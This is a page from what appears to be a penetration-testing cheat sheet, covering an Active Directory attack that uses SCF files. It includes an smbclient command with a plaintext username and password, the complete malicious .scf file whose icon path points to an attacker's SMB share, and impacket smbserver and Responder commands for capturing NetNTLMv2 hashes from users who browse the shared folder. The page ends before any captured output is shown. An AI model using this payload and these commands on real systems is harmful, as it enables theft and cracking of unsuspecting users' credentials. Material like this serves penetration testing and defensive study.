Cheat Sheet Hacking
  • 🌐Generic Ideas
    • File Transfer
    • Reverse Shell
    • Cracking Tricks
    • Tunneling and Port Forwarding
    • Reversing
    • OSINT
    • Phishing
  • 🐕‍🦺Port enumeration
    • Reconnaissance
    • 53 - DNS
    • 80,443 - Web
      • Identify php.ini file used
      • Exploitation
        • File Upload
        • XXS
    • 445 - SMB
    • 389, 636, 3268 - LDAP(S)
  • LINUX THINGS
    • Enumeration
    • Privilege Escalation
      • Writable $PATH
  • WINDOWS THINGS
    • Enumeration
    • Useful Commands
    • Active Directory Methodology
      • Commands to create AD environment
      • Attacks
        • Kerberos
          • User enumeration
          • ASREP-Roast
          • Kerberoasting
          • ASREP-Roast VS Kerberoasting
          • Golden Ticket
          • Resource Based Constrained Delegation
        • Secrets dump
        • Pass The Hash
        • Dump NTDS
        • Tickets
          • TGT
        • NTML Password Spray
        • LDAP Authentication
          • LDAP Pass-back
          • Rogue LDAP Server
        • SMB Relay (LLNMR, NTB-NS & WPAD)
        • NTLM Relay
        • Tools to exploit AD things
        • SCF Files
      • Kerberos
      • SAM & LSA secrets
      • Enumeration
        • BloodHound
        • PowerView
          • CheatSheet of Commands
        • Set DNS & DOMAIN
      • Resources
      • RunAs
      • Post Explotation
        • Persistence
        • Mimikatz
      • Common used tools
  • 🕳️Pivoting
    • Port Forwarding
    • Socks Forwarding
    • Routing
    • Web Fuzzing
    • Transfer files
    • Metasploit
      • Single Pivot
      • Double Pivot
    • Burp Suite
  • 🎛️Hardware
    • Physical attacks
  • 🌕Buffer Overflow
    • Introduction
    • Stack-Based
      • Introduction
        • Spiking
        • Fuzzing
        • Find Offset
        • Overwrite EIP
        • Find module
        • Find Badchars
        • Shellcode
  • 🐳Docker
    • Commands
    • Practical examples
  • 💡Useful things
    • Burp Suite
      • Proxy Activation
    • Linux Commands
    • Recreate multipart/form-data request
      • Python
      • HTML & netcat
    • TTY
    • Templates for reports (exams)
    • Tmux
    • Other cheat sheets
Powered by GitBook
On this page
  • Access to Shared Folder
  • Create SCF file
  • Upload SCF file to Shared Folder
  • Serve the attacker Shared Folder
  • Or using Responder.py
  1. WINDOWS THINGS
  2. Active Directory Methodology
  3. Attacks

SCF Files

PreviousTools to exploit AD thingsNextKerberos

Last updated 5 months ago

Imagine we have write permission to a shared folder, we could use it to save a .scf file, trick a user to access it and obtain its NetNTLMv2 hash. If its password is weak, we could obtain the plain text of it.

Access to Shared Folder

smbclient //10.10.10.10/payroll-2024 -U 'freed-om-corp.com\carlos.villamizar%NastAsya4475'

Create SCF file

[Shell]
Command=2
IconFile=\\10.10.10.20\mycompartida\quepasomirey.ico
[Taskbar]
Command=ToggleDesktop

Upload SCF file to Shared Folder

Serve the attacker Shared Folder

python3 /opt/impacket/examples/smbserver.py mycompartida $(pwd) -smb2support

And now we need to wait for an interaction with the payroll-2024 shared folder.

Waiting... ANDD if someone is interacting with the folder we will receive a NetNTLMv2 hash in our mycompartida shared folder.

Or using Responder.py

sudo python3 Responder.py -I eth0

Wait and once we detect an interaction with the folder: